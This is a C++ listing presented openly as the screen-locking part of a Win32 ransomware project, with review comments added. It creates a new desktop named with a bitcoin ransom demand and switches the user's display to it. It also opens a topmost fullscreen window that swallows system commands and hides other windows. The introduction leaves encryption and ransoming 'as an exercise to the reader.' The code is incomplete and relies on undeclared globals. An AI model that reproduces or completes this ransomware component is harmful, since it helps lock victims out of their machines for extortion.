The following is a basic C++ skeleton for the screen-control part of a Win32 ransomware project. It lets you “control” what a Windows session’s terminal/screen shows by creating a separate desktop and switching the display to it. File encryption, transport, ransoming, destruction, etc. are not included and are left as an exercise to the reader.
#include <Windows.h>
#include <WinGDI.h>
// Creates the single child control shown inside the full-screen window and
// applies the shared font to it.
// IDC_BUTTON0, instance and h_font are not declared in this listing; they are
// presumably file-level definitions elsewhere - TODO confirm.
void CreateWndContent0(HWND parent)
{
HWND wnd;
// The class name is L"BTN", not the stock L"BUTTON" control class, so it
// presumably has to be registered somewhere outside this listing - TODO confirm.
// Style 0x50012F00: the high word 0x5001 is WS_CHILD | WS_VISIBLE | WS_TABSTOP;
// the low word 0x2F00 is class-specific and its meaning depends on that class.
// Position (50,100) and size 200x100 are relative to the parent's client area.
wnd = CreateWindowExW(NULL, L"BTN", L"btn", 0x50012F00, 50, 100, 200, 100, parent, (HMENU) IDC_BUTTON0, instance, NULL);
// NOTE(review): the CreateWindowExW result is not checked before it is used here.
SendMessage(wnd, WM_SETFONT, (WPARAM) h_font, TRUE);
}
// Window procedure for the full-screen window created by CreateWnd0().
// Returns FALSE (0) for the messages it handles itself, true for WM_SYSCOMMAND,
// and the DefWindowProc result for everything else.
LRESULT CALLBACK WndProc0(HWND hwnd, UINT msg, WPARAM wparam, LPARAM lparam)
{
switch (msg)
{
// Build the child control once the window exists.
case WM_CREATE:
CreateWndContent0(hwnd);
break;
case WM_COMMAND:
switch (LOWORD(wparam))
{
// Button click: show a modal message box, then deliver WM_DESTROY straight to
// this procedure. That runs the WM_DESTROY case below (PostQuitMessage);
// DestroyWindow is not called here.
case IDC_BUTTON0:
MessageBoxW(hwnd, L"BTN is clicked.", L"Event", MB_OK | MB_ICONINFORMATION);
SendMessageW(hwnd, WM_DESTROY, NULL, false);
break;
}
break;
// Returns without forwarding to DefWindowProc, so system commands addressed to
// this window are never carried out by the default handler. This is the part
// of the listing that makes the window ignore the usual window-management
// requests. The break after the return is unreachable.
case WM_SYSCOMMAND:
return true;
break;
// Ends the message loop of the thread that owns this window.
case WM_DESTROY:
PostQuitMessage(0);
break;
default:
return DefWindowProc(hwnd, msg, wparam, lparam);
}
return FALSE;
}
// Creates the borderless (WS_POPUP) top-level window, records it in hWindow0,
// marks it topmost and shows it. Returns the window handle.
// WND_CLASS_NAME0, instance and hWindow0 are not declared in this listing.
HWND CreateWnd0()
{
HWND wnd;
// Origin (0,0) with a hard-coded 1920x1080 size; other resolutions or
// multi-monitor layouts are not handled by this call.
wnd = CreateWindowExW(NULL, WND_CLASS_NAME0, L"window", WS_POPUP, 0, 0, 1920, 1080, NULL, NULL, instance, NULL);
// Author's TODO: the size above is fixed and was meant to be queried at run time.
// Get screen size dynamically for the win
// Stored globally; HideWindowProc compares against this handle.
// NOTE(review): the CreateWindowExW result is not checked, so a failed call
// stores and returns a null handle.
hWindow0 = wnd;
// HWND_TOPMOST with SWP_NOMOVE | SWP_NOSIZE changes only the Z-order and
// visibility; position and size stay as created.
SetWindowPos(wnd, HWND_TOPMOST, 0, 0, 0, 0, SWP_NOMOVE | SWP_NOSIZE | SWP_SHOWWINDOW);
ShowWindow(wnd, SW_SHOWNORMAL);
UpdateWindow(wnd);
return wnd;
}
// Thread entry point started by Window::Init(). Binds the thread to the newly
// created desktop, registers the window class, creates the window and runs the
// message loop. `param` is unused.
// hDesktop, RegisterClasses and MessageLoop are not defined in this listing.
DWORD WINAPI Window0Thread( LPVOID param )
{
// Must run before any window is created on this thread: windows belong to the
// desktop their creating thread is assigned to.
SetThreadDesktop(hDesktop); // New desktop where further windows created
RegisterClasses(WndProc0, WND_CLASS_NAME0);
CreateWnd0();
// Presumably blocks until WM_QUIT is posted by WndProc0 - TODO confirm against
// the MessageLoop definition.
MessageLoop();
// Terminates the thread with exit code 0; there is no return statement.
ExitThread(0);
}
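// Setup and teardown of the separate desktop that the full-screen window is
// shown on. instance, h_font, hWinsta, hDesktop, hOldDesktop, hWindow0 and
// hThreadWindow0 are not declared in this listing; they are presumably
// file-level globals - TODO confirm.
//
// NOTE(review): for defenders, the observable behaviour in this namespace is a
// user process creating a new desktop and making it the input desktop.
// Legitimate software does this too (credential prompts, desktop-switching
// utilities), so treat it as a signal to correlate, not as a verdict.
namespace Window
{
    // Window-enumeration callback: hides every window except those whose
    // root owner is hWindow0. Always returns true so enumeration continues.
    // It is not referenced anywhere in this listing; presumably it is passed
    // to a window-enumeration API elsewhere - TODO confirm. lParam is unused.
    bool CALLBACK HideWindowProc(HWND hwnd, LPARAM lParam)
    {
        // 3 is GA_ROOTOWNER: walk the parent/owner chain to the root owner.
        if(GetAncestor(hwnd, 3) == hWindow0)
            return true;
        ShowWindow(hwnd, SW_HIDE);
        return true;
    }

    // Creates the font and the new desktop, switches the display to that
    // desktop and starts the window thread. Always returns true; none of the
    // API results below are checked.
    bool Init(HINSTANCE hInstance)
    {
        instance = hInstance;
        InitCommonControls();
        // Height -13, normal weight, "Times New Roman"; used for the child control.
        h_font = CreateFontW(-13, 0, 0, 0, FW_NORMAL, 0,
            0, 0, ANSI_CHARSET, OUT_DEFAULT_PRECIS, CLIP_DEFAULT_PRECIS,
            DEFAULT_QUALITY, DEFAULT_PITCH | FF_DONTCARE, L"Times New Roman");
        // Reads the current window station and assigns the same one back.
        hWinsta = GetProcessWindowStation();
        SetProcessWindowStation(hWinsta);
        // The first argument is the desktop's name. The desktop is created in
        // the process's current window station with GENERIC_ALL access.
        hDesktop = CreateDesktopW(L"Our ransomware message, give us all the bitcoins!", 0, 0, 0, GENERIC_ALL, NULL);
        // Remember the desktop this thread started on so DeInit() can switch back.
        hOldDesktop = GetThreadDesktop(GetCurrentThreadId());
        SetThreadDesktop(hDesktop); // All windows created under this desktop.
        // SwitchDesktop changes which desktop is displayed and receives input;
        // the original desktop is kept in hOldDesktop for DeInit().
        SwitchDesktop(hDesktop); // Take control of what the user sees. Show them the message.
        hThreadWindow0 = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) &Window0Thread, 0, 0, 0);
        return true;
    }

    // Switches the display back to the original desktop and closes the
    // handles opened by Init(). The window thread handle is not waited on or
    // closed here.
    void DeInit()
    {
        // The second half of this comment had wrapped onto its own line as bare
        // text, which does not compile; it is folded back into the comment.
        SwitchDesktop(hOldDesktop); // Restore the old, original, desktop. Because you're a nice boy ;)
        CloseDesktop(hDesktop);
        CloseWindowStation(hWinsta);
    }
}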